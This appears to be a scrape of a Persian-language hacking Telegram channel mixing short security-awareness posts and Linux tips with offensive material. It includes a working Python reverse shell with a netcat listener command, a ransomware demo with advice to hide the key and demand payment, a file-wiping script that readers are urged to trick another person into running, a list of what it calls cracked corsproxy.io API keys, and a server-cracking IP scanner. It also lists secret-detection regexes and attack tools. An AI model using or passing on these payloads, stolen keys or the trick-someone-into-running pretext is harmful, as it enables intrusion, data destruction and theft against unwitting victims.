🔴 Hacker Fact | حتی MFA هم همیشه کافی نیست...
در حملهی MFA Fatigue، مهاجم با ارسال درخواستهای متعدد ورود، کاربر را تحت فشار قرار میدهد تا در نهایت یکی از درخواستها را تأیید کند. 👀
🎯 این حمله بهجای شکستن MFA، روی خستگی و بیدقتی کاربر حساب میکند.
⚠️ اگر درخواست MFA را خودت شروع نکردی، تأییدش نکن.
🔴 Hacker Fact | Even MFA Isn’t Always Enough...
In an MFA Fatigue attack, an attacker sends repeated login requests, hoping the user will eventually approve one of them. 👀
🎯 Instead of breaking MFA, the attack relies on user fatigue and inattention.
⚠️ If you didn’t initiate the login, don’t approve the MFA request.
#CyberSecurity #MFA #RedTeam #SecurityAwareness
#Tyger
در حملهی MFA Fatigue، مهاجم با ارسال درخواستهای متعدد ورود، کاربر را تحت فشار قرار میدهد تا در نهایت یکی از درخواستها را تأیید کند. 👀
🎯 این حمله بهجای شکستن MFA، روی خستگی و بیدقتی کاربر حساب میکند.
⚠️ اگر درخواست MFA را خودت شروع نکردی، تأییدش نکن.
🔴 Hacker Fact | Even MFA Isn’t Always Enough...
In an MFA Fatigue attack, an attacker sends repeated login requests, hoping the user will eventually approve one of them. 👀
🎯 Instead of breaking MFA, the attack relies on user fatigue and inattention.
⚠️ If you didn’t initiate the login, don’t approve the MFA request.
#CyberSecurity #MFA #RedTeam #SecurityAwareness
#Tyger
❤2
از الان میگم خدارو شکر وضعیت اومدن ممبر به کانالم خوبه روزانه 200.300تا میاد از رو تبلیغات
از همین الان قول میدم که دیدین دفعه قبل گفتم 6کا بشیم قره کشی راه میندازم
الانم میگم اگه 20کا بشیم بلاخره هزینه بردار
20تا یا قره کشی 3ماهه پریمیوم انجام میدم
یا 10تا 6ماهه
اگه از این به بعد قول بدین
تو حمایت بترکونین شاید زودتر هم انجام بدم
کافیه بهم انگیزه بیاد من جبران میکنم🔪
از همین الان قول میدم که دیدین دفعه قبل گفتم 6کا بشیم قره کشی راه میندازم
الانم میگم اگه 20کا بشیم بلاخره هزینه بردار
20تا یا قره کشی 3ماهه پریمیوم انجام میدم
یا 10تا 6ماهه
اگه از این به بعد قول بدین
تو حمایت بترکونین شاید زودتر هم انجام بدم
کافیه بهم انگیزه بیاد من جبران میکنم
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12🔥2
newfile.py
6.2 KB
اینم یک اسکریپت شخصی سازی شده
برای حذف فایل های شخصی
فقط کافیه بدین طرف ران کنه توی اندروید با ترموکس یا پایدروید توی ویندوز با وی اس کد یا توی لینکوس با ترمینال
البته طرف کد نویس باشه متوجه میشه
این صرفا بخاطر کسایی هست که آتویی دست یکی داره و میخواد پاک بشه
پس استفاده درست کنین ازش
در ضمن به هیچ عنوان خودتون ران نکنین تو کسری از ثانیه همه اطلاعات دلت میشه
برای حذف فایل های شخصی
فقط کافیه بدین طرف ران کنه توی اندروید با ترموکس یا پایدروید توی ویندوز با وی اس کد یا توی لینکوس با ترمینال
البته طرف کد نویس باشه متوجه میشه
این صرفا بخاطر کسایی هست که آتویی دست یکی داره و میخواد پاک بشه
پس استفاده درست کنین ازش
در ضمن به هیچ عنوان خودتون ران نکنین تو کسری از ثانیه همه اطلاعات دلت میشه
❤4
لیست ۲۵ الگوی Regex برای شناسایی اطلاعات حساس (Data Leakage)
#Regex #آموزشی #ℳℴ𝒷𝒾𝓃
\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}\b (Email)
\b(?:\d[ -]*?){13,16}\b (Credit Card)
\b\d{3}-\d{2}-\d{4}\b (SSN)
\bAKIA[0-9A-Z]{16}\b (AWS Access Key)
\bASIA[0-9A-Z]{16}\b (AWS Temp Key)
AIza[0-9A-Za-z_-]{35} (Google API Key)
sk_live_[0-9a-zA-Z]{24,} (Stripe Secret Key)
ghp_[0-9a-zA-Z]{36} (GitHub Token)
xox[baprs]-[0-9a-zA-Z-]{10,} (Slack Token)
-----BEGIN RSA PRIVATE KEY----- (Private Key)
-----BEGIN OPENSSH PRIVATE KEY----- (SSH Key)
password\s*[:=]\s*\S+ (Password)
secret\s*[:=]\s*\S+ (Secret)
api[_-]?key\s*[:=]\s*\S+ (API Key)
token\s*[:=]\s*\S+ (Token)
Authorization\s*:\s*Bearer\s+\S+ (Bearer Token)
mongodb(\+srv)?://[^\s]+ (MongoDB URL)
postgres://[^\s]+ (PostgreSQL URL)
mysql://[^\s]+ (MySQL URL)
redis://[^\s]+ (Redis URL)
amqp://[^\s]+ (RabbitMQ URL)
ftp://[^\s]+ (FTP URL)
smtp://[^\s]+ (SMTP URL)
BEGIN PGP PRIVATE KEY (PGP Key)
\d{11} (Iran National ID)#Regex #آموزشی #ℳℴ𝒷𝒾𝓃
🔥3❤2
لیست ۱۰ ابزار ضروری برای تست امنیت (همه رایگان)
Nmap – اسکن شبکه و پورت
Burp Suite Community – تست برنامه تحت وب
Wireshark – تحلیل ترافیک شبکه
Nikto – اسکنر آسیبپذیری وب
SQLmap – تست تزریق SQL
Hydra – تست brute-force رمز عبور
Metasploit Framework – تست نفوذ کامل
Gobuster – پیدا کردن مسیرهای مخفی
John the Ripper – کرک پسورد
Aircrack-ng – تست امنیت وایفای
#tools #آموزشی #ℳℴ𝒷𝒾𝓃
Nmap – اسکن شبکه و پورت
Burp Suite Community – تست برنامه تحت وب
Wireshark – تحلیل ترافیک شبکه
Nikto – اسکنر آسیبپذیری وب
SQLmap – تست تزریق SQL
Hydra – تست brute-force رمز عبور
Metasploit Framework – تست نفوذ کامل
Gobuster – پیدا کردن مسیرهای مخفی
John the Ripper – کرک پسورد
Aircrack-ng – تست امنیت وایفای
#tools #آموزشی #ℳℴ𝒷𝒾𝓃
🔥4❤1
لیست ۱۵ هدر امنیتی که هر وبسایت باید داشته باشد
اگر سایت دارید، این هدرها را روی سرور خود تنظیم کنید تا امنیت بالاتری داشته باشید.
#آموزشی #ℳℴ𝒷𝒾𝓃
اگر سایت دارید، این هدرها را روی سرور خود تنظیم کنید تا امنیت بالاتری داشته باشید.
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: default-src 'self'
Referrer-Policy: no-referrer
Permissions-Policy: geolocation=(), microphone=()
X-XSS-Protection: 1; mode=block
Cache-Control: no-store
Pragma: no-cache
Access-Control-Allow-Origin: https://example.com
Feature-Policy: camera 'none'
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Set-Cookie: Secure; HttpOnly; SameSite=Strict
#آموزشی #ℳℴ𝒷𝒾𝓃
❤4🔥1
لیست ۲۰ هدر رایج که اطلاعات سرور را لو میدهند
#آموزشی #ℳℴ𝒷𝒾𝓃
Server: Apache/2.4.41
Server: nginx/1.18.0
Server: Microsoft-IIS/10.0
Server: LiteSpeed
X-Powered-By: PHP/7.4.33
X-Powered-By: ASP.NET
X-Powered-By: Express
X-AspNet-Version: 4.0.30319
X-Runtime: 0.123456
X-Drupal-Cache: HIT
X-Generator: WordPress 6.4.1
X-Varnish: 123456
Via: 1.1 varnish
X-Cache: HIT
X-Amz-Cf-Id: abc123
X-Backend-Server: web01
X-Request-ID: 1234567890
X-Debug-Token: abcdef123456
X-Trace-Id: 1234567890
X-Transaction-ID: abcdef123456
#آموزشی #ℳℴ𝒷𝒾𝓃
❤4🔥1
لیست ۱۵ خطای رایج که اطلاعات حساس لو میدهند
#آموزشی #ℳℴ𝒷𝒾𝓃
Warning: mysqli_fetch_array() expects parameter...
Fatal error: Uncaught Exception...
Notice: Undefined index: user in...
Parse error: syntax error, unexpected...
PDOException: SQLSTATE[42000]...
Stack trace: #0 /var/www/html...
ORA-00933: SQL command not properly ended
Microsoft OLE DB Provider for ODBC Drivers
TypeError: Cannot read property...
NullPointerException at com.example...
Debugging info: SELECT * FROM users...
Traceback (most recent call last)...
Warning: pg_connect(): Unable to connect...
MySQL server version for the right syntax...
Path: /home/user/public_html/...
#آموزشی #ℳℴ𝒷𝒾𝓃
❤4🔥1
۵۰ عدد User-Agent:
#User-Agent #آموزشی #ℳℴ𝒷𝒾𝓃
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.52
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.2277.128
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.52
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 OPR/107.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Mozilla/5.0 (iPhone; CPU iPhone OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Linux; Android 14; SM-S921B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 13; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 14; SM-T970) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
#User-Agent #آموزشی #ℳℴ𝒷𝒾𝓃
🔥4❤1👍1
تعدادی پروکسی کرک شده فعال از سایت corsproxy.io:
#Cors_Proxy #آموزشی #ℳℴ𝒷𝒾𝓃
https://corsproxy.io/?key=3ea6efce&url=http://example.com
https://corsproxy.io/?key=14140035&url=http://example.com
https://corsproxy.io/?key=1101a4e3&url=http://example.com
https://corsproxy.io/?key=7fe10987&url=http://example.com
https://corsproxy.io/?key=fa1a827f&url=http://example.com
https://corsproxy.io/?key=798be704&url=http://example.com
https://corsproxy.io/?key=5f0076e6&url=http://example.com
https://corsproxy.io/?key=bdf29fc5&url=http://example.com
https://corsproxy.io/?key=5f7d15ff&url=http://example.com
https://corsproxy.io/?key=839cf7da&url=http://example.com
https://corsproxy.io/?key=b9aac4bc&url=http://example.com
https://corsproxy.io/?key=856c89ff&url=http://example.com
https://corsproxy.io/?key=054af249&url=http://example.com
https://corsproxy.io/?key=02a83d86&url=http://example.com
https://corsproxy.io/?key=b5b98ce9&url=http://example.com
https://corsproxy.io/?key=f5bebaf5&url=http://example.com
https://corsproxy.io/?key=08677b5d&url=http://example.com
https://corsproxy.io/?key=9c95e1f7&url=http://example.com
https://corsproxy.io/?key=4b9f21b0&url=http://example.com
https://corsproxy.io/?key=d3b9501d&url=http://example.com
https://corsproxy.io/?key=2a6e1787&url=http://example.com
https://corsproxy.io/?key=86f67453&url=http://example.com
https://corsproxy.io/?key=eee8f095&url=http://example.com
https://corsproxy.io/?key=a435fa40&url=http://example.com
https://corsproxy.io/?key=4a61f73f&url=http://example.com
https://corsproxy.io/?key=b5a8fa6e&url=http://example.com
https://corsproxy.io/?key=e9871471&url=http://example.com
https://corsproxy.io/?key=4f2b3b5d&url=http://example.com
https://corsproxy.io/?key=345b7a9a&url=http://example.com
https://corsproxy.io/?key=4dbb19c1&url=http://example.com
#Cors_Proxy #آموزشی #ℳℴ𝒷𝒾𝓃
❤3⚡1🔥1
🌑 Hacker Fact | وقتی سایت مورد اعتماد تبدیل به تله میشه...
در حملهی Watering Hole، مهاجم یک وبسایت مورد اعتمادِ گروه هدف را آلوده یا دستکاری میکند تا بازدیدکنندگان آن را هدف قرار دهد. 👁️
🎯 قربانی ممکن است بدون کلیک روی یک لینک مشکوک، صرفاً با بازدید از یک سایت آشنا در معرض حمله قرار بگیرد.
⚠️ حتی سایتهای آشنا هم همیشه به معنی سایتهای امن نیستند.
---
🌑 Hacker Fact | When a Trusted Website Becomes a Trap...
In a Watering Hole Attack, an attacker compromises or manipulates a website trusted by the target group to target its visitors. 👁️
🎯 A victim may be exposed simply by visiting a familiar website, without clicking a suspicious link.
⚠️ A familiar website isn’t always a safe website.
#CyberSecurity #WateringHole #Hacking #RedTeam #Tyger
در حملهی Watering Hole، مهاجم یک وبسایت مورد اعتمادِ گروه هدف را آلوده یا دستکاری میکند تا بازدیدکنندگان آن را هدف قرار دهد. 👁️
🎯 قربانی ممکن است بدون کلیک روی یک لینک مشکوک، صرفاً با بازدید از یک سایت آشنا در معرض حمله قرار بگیرد.
⚠️ حتی سایتهای آشنا هم همیشه به معنی سایتهای امن نیستند.
---
🌑 Hacker Fact | When a Trusted Website Becomes a Trap...
In a Watering Hole Attack, an attacker compromises or manipulates a website trusted by the target group to target its visitors. 👁️
🎯 A victim may be exposed simply by visiting a familiar website, without clicking a suspicious link.
⚠️ A familiar website isn’t always a safe website.
#CyberSecurity #WateringHole #Hacking #RedTeam #Tyger
❤5
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥6❤3👍1
🎯 Victim Fact | قربانی همیشه متوجه نمیشود...
گاهی قربانی یک حمله ممکنه هفتهها یا حتی ماهها از حضور مهاجم در سیستمش خبر نداشته باشه. 👁️
مهاجم میتونه مدتی بدون ایجاد رفتار کاملاً واضح، اطلاعات جمعآوری کنه یا دسترسی خودش رو حفظ کنه.
⚠️ خطرناکترین حمله، همیشه حملهای نیست که سریع دیده بشه.
پ.ن: یاد فیلم Mr. Robot افتادم :)
---
🎯 Victim Fact | The Victim Doesn’t Always Notice...
Sometimes, a victim may remain unaware of an attacker’s presence for weeks or even months. 👁️
An attacker may stay under the radar while gathering information or maintaining access.
⚠️ The most dangerous attack isn’t always the one you notice immediately.
P.S.: This reminded me of Mr. Robot :)
#CyberSecurity #Victim #Hacking #RedTeam #Tyger
گاهی قربانی یک حمله ممکنه هفتهها یا حتی ماهها از حضور مهاجم در سیستمش خبر نداشته باشه. 👁️
مهاجم میتونه مدتی بدون ایجاد رفتار کاملاً واضح، اطلاعات جمعآوری کنه یا دسترسی خودش رو حفظ کنه.
⚠️ خطرناکترین حمله، همیشه حملهای نیست که سریع دیده بشه.
پ.ن: یاد فیلم Mr. Robot افتادم :)
---
🎯 Victim Fact | The Victim Doesn’t Always Notice...
Sometimes, a victim may remain unaware of an attacker’s presence for weeks or even months. 👁️
An attacker may stay under the radar while gathering information or maintaining access.
⚠️ The most dangerous attack isn’t always the one you notice immediately.
P.S.: This reminded me of Mr. Robot :)
#CyberSecurity #Victim #Hacking #RedTeam #Tyger
❤4
شل معکوس (Reverse Shell)
چطوری باید استفاده بکنید
خوب شما به عنوان هاکر در سیستم مهاجم ابتدا
nc -lvnp 4444
اجرا کنید، بعد این کد را در سیستم قربانی اجرا کنید.
این برای آموزش هست رو گوشی فامیل ها تست نکنید. 😂
#Shell #آموزشی #ℳℴ𝒷𝒾𝓃
# reverse_shell_demo.py
# این کد یک اتصال معکوس به سیستم مهاجم برقرار میکند
# فقط در محیط آزمایشی با اجازه صاحب سیستم
import socket
import subprocess
import os
# آدرس و پورت سیستم مهاجم (برای تست، از localhost استفاده کنید)
ATTACKER_IP = "127.0.0.1"
ATTACKER_PORT = 4444
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, ATTACKER_PORT))
# ارسال پوسته به مهاجم
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
چطوری باید استفاده بکنید
خوب شما به عنوان هاکر در سیستم مهاجم ابتدا
nc -lvnp 4444
اجرا کنید، بعد این کد را در سیستم قربانی اجرا کنید.
این برای آموزش هست رو گوشی فامیل ها تست نکنید. 😂
#Shell #آموزشی #ℳℴ𝒷𝒾𝓃
❤3
باجافزار نمایشی (Ransomware Demo)
برای استفاده
به cryptography نیاز داری
pip install cryptography
این کد فقط یک فایل در /tmp را رمزنگاری میکنه و بعد کلید رو نشون میده
تو نسخه حرفهای باید کلید را مخفی بکنید و درخواست رو هم باج بکنید. این بیشتر نمونه بود. ✅
#Ransomware #آموزشی #ℳℴ𝒷𝒾𝓃
# ransomware_demo.py
# این کد فقط یک فایل نمونه را در یک پوشه موقت رمزنگاری میکند
# برای درک مفهوم رمزنگاری، نه برای استفاده واقعی
import os
from cryptography.fernet import Fernet
# فقط یک فایل تستی در /tmp
test_file = "/tmp/testfile.txt"
# ساخت فایل نمونه
with open(test_file, "w") as f:
f.write("این یک فایل تست است")
# تولید کلید
key = Fernet.generate_key()
cipher = Fernet(key)
# رمزنگاری فایل
with open(test_file, "rb") as f:
data = f.read()
encrypted = cipher.encrypt(data)
with open(test_file + ".encrypted", "wb") as f:
f.write(encrypted)
# حذف فایل اصلی (در محیط واقعی ممکن است حذف شود)
os.remove(test_file)
print(f"فایل رمزنگاری شد. کلید: {key.decode()}")
برای استفاده
به cryptography نیاز داری
pip install cryptography
این کد فقط یک فایل در /tmp را رمزنگاری میکنه و بعد کلید رو نشون میده
تو نسخه حرفهای باید کلید را مخفی بکنید و درخواست رو هم باج بکنید. این بیشتر نمونه بود. ✅
#Ransomware #آموزشی #ℳℴ𝒷𝒾𝓃
❤3
🐧 آموزش ۳۰ ثانیهای لینوکس
🔎 دنبال یه فایل بین کلی پوشه میگردی؟ لازم نیست دونهدونه بگردی!
با "find" میتونی خیلی سریع پیداش کنی:
find ~ -name "filename"
اگه اسم کامل فایل یادت نیست، میتونی بخشی از اسمش رو جستجو کنی:
find ~ -iname "*config*"
⚡ یه دستور ساده، ولی کاربردی برای صرفهجویی کلی در زمان.
ترمینال رو دستکم نگیر! 🐧
#Linux #KaliLinux #LightKali #Terminal #LinuxTips #CyberSecurity #InfoSec
#Tyger
🔎 دنبال یه فایل بین کلی پوشه میگردی؟ لازم نیست دونهدونه بگردی!
با "find" میتونی خیلی سریع پیداش کنی:
find ~ -name "filename"
اگه اسم کامل فایل یادت نیست، میتونی بخشی از اسمش رو جستجو کنی:
find ~ -iname "*config*"
⚡ یه دستور ساده، ولی کاربردی برای صرفهجویی کلی در زمان.
ترمینال رو دستکم نگیر! 🐧
#Linux #KaliLinux #LightKali #Terminal #LinuxTips #CyberSecurity #InfoSec
#Tyger
❤2🔥1
🕵️♂️ Subfinder — پیدا کردن Subdomainها
اگه تازه وارد دنیای امنیت شدی، اول بدون Subdomain چیه 👇
فرض کن سایت اصلی اینه:
🌐
ممکنه بخشهای مختلف سایت روی آدرسهای جدا باشن، مثلاً:
🔹
🔹
🔹
به این آدرسهای فرعی میگیم Subdomain.
حالا Subfinder چیکار میکنه؟ 🤔
🔎 بهصورت Passive در منابع مختلف جستجو میکنه تا Subdomainهای مربوط به یک دامنه رو پیدا کنه؛ یعنی برای شروع کار لازم نیست مستقیم به سایت درخواستهای زیادی بفرسته.
📌 نصب در Kali:
⚡ مثال ساده:
یعنی:
👉 «Subdomainهای مربوط به
💾 اگه بخوای نتیجه رو داخل یک فایل ذخیره کنی:
🎯 به چه دردی میخوره؟
• 🔍 پیدا کردن داراییهای یک دامنه
• 🛡️ بررسی سطح حمله
• 🐞 Bug Bounty
• 🕵️ OSINT
💡 خلاصه:
⚠️ فقط روی دامنههایی که اجازه بررسیشون رو داری استفاده کن.
#Linux #KaliLinux #LightKali #Subfinder #BugBounty #OSINT #CyberSecurity
#Tyger
اگه تازه وارد دنیای امنیت شدی، اول بدون Subdomain چیه 👇
فرض کن سایت اصلی اینه:
🌐
example.comممکنه بخشهای مختلف سایت روی آدرسهای جدا باشن، مثلاً:
🔹
blog.example.com🔹
shop.example.com🔹
api.example.comبه این آدرسهای فرعی میگیم Subdomain.
حالا Subfinder چیکار میکنه؟ 🤔
🔎 بهصورت Passive در منابع مختلف جستجو میکنه تا Subdomainهای مربوط به یک دامنه رو پیدا کنه؛ یعنی برای شروع کار لازم نیست مستقیم به سایت درخواستهای زیادی بفرسته.
📌 نصب در Kali:
sudo apt install subfinder
⚡ مثال ساده:
subfinder -d example.com
یعنی:
👉 «Subdomainهای مربوط به
example.com رو پیدا کن.»💾 اگه بخوای نتیجه رو داخل یک فایل ذخیره کنی:
subfinder -d example.com -o subdomains.txt
🎯 به چه دردی میخوره؟
• 🔍 پیدا کردن داراییهای یک دامنه
• 🛡️ بررسی سطح حمله
• 🐞 Bug Bounty
• 🕵️ OSINT
💡 خلاصه:
example.com → 🔎 Subfinder → 📋 لیستی از Subdomainها⚠️ فقط روی دامنههایی که اجازه بررسیشون رو داری استفاده کن.
#Linux #KaliLinux #LightKali #Subfinder #BugBounty #OSINT #CyberSecurity
#Tyger
❤6🔥1
🐧 Linux Practical |
🐧 نسخه لینوکس رو چطور بفهمیم؟
با:
میتونی نام توزیع و نسخه سیستمعامل رو مشاهده کنی.
💡 این اطلاعات هنگام نصب ابزارها و عیبیابی مشکلات خیلی کاربردیه.
#Linux #KaliLinux #LightKali #LinuxTips #CyberSecurity
#Tyger
🐧 نسخه لینوکس رو چطور بفهمیم؟
با:
cat /etc/os-releaseمیتونی نام توزیع و نسخه سیستمعامل رو مشاهده کنی.
💡 این اطلاعات هنگام نصب ابزارها و عیبیابی مشکلات خیلی کاربردیه.
#Linux #KaliLinux #LightKali #LinuxTips #CyberSecurity
#Tyger
❤5
newfile.py
3.8 KB
یک آی پی اسکنر برای کرک سرور
سرعت نسبتا خوبی داره
اینم کتابخانه های قابل نصب
دیگه نیازی به توضیح اضافی نیست
دو سه روز سرم شلوغ مطمئن باشید جبران میکنم براتون
سرعت نسبتا خوبی داره
aiohttp aiodns coloramaاینم کتابخانه های قابل نصب
دیگه نیازی به توضیح اضافی نیست
دو سه روز سرم شلوغ مطمئن باشید جبران میکنم براتون
❤9⚡1